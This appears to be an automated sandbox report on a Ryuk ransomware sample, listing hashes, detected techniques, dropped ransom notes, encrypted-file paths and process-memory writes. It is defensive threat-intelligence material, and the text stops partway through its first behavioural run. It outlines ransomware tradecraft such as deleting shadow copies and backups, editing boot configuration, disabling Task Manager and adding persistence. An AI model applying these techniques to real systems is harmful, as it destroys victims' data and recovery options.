Malware Analysis Report

2024-08-06 09:27

Sample ID: 221110-g3yxnsfde9
Target: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA256: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
Tags: ryuk discovery evasion ransomware
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe

Threat Level: Known bad

The file 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Clears Windows event logs

Modifies boot configuration data using bcdedit

Deletes shadow copies

Deletes backup catalog

Disables use of System Restore points

Disables Task Manager via registry modification

Disables taskbar notifications via registry modification

Checks computer location settings

Modifies file permissions

Drops startup file

Enumerates connected drives

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Runs net.exe

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Interacts with shadow copies

Kills process with taskkill

Opens file in notepad (likely ransom note)

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported: 2022-11-10 06:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2022-11-10 06:20

Reported: 2022-11-10 06:23

Platform: win7-20220901-en

Max time kernel: 146s

Max time network: 49s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"

Signatures

Ryuk

ransomware ryuk

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_COL.HXT.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\SHOVEL.WAV.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL065.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107192.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00261_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Country.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File created C:\Program Files\Java\RyukReadMe.html C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18181_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Library\SOLVER\SOLVER.XLAM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\RECYCLE.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00671_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115842.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SplashScreen.bmp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152568.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0233512.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSQRY32.CHM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN075.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01240_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\OLTASKR.FAE.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yellowknife.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00233_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01905_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01300_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Median.thmx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\CLNTWRAP.HTM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\HeartsMCE.lnk.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00396_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FORM.JS.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\OCT.CHM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\EXITEML.ICO.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Earthy.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SPACE_01.MID.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1468 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1416 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1468 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 296 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1468 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1936 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1468 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 464 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 464 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 464 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1468 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1780 wrote to memory of 288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1780 wrote to memory of 288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1780 wrote to memory of 288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1468 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1924 wrote to memory of 832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1924 wrote to memory of 832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1924 wrote to memory of 832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1468 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1672 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1672 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1672 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1468 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
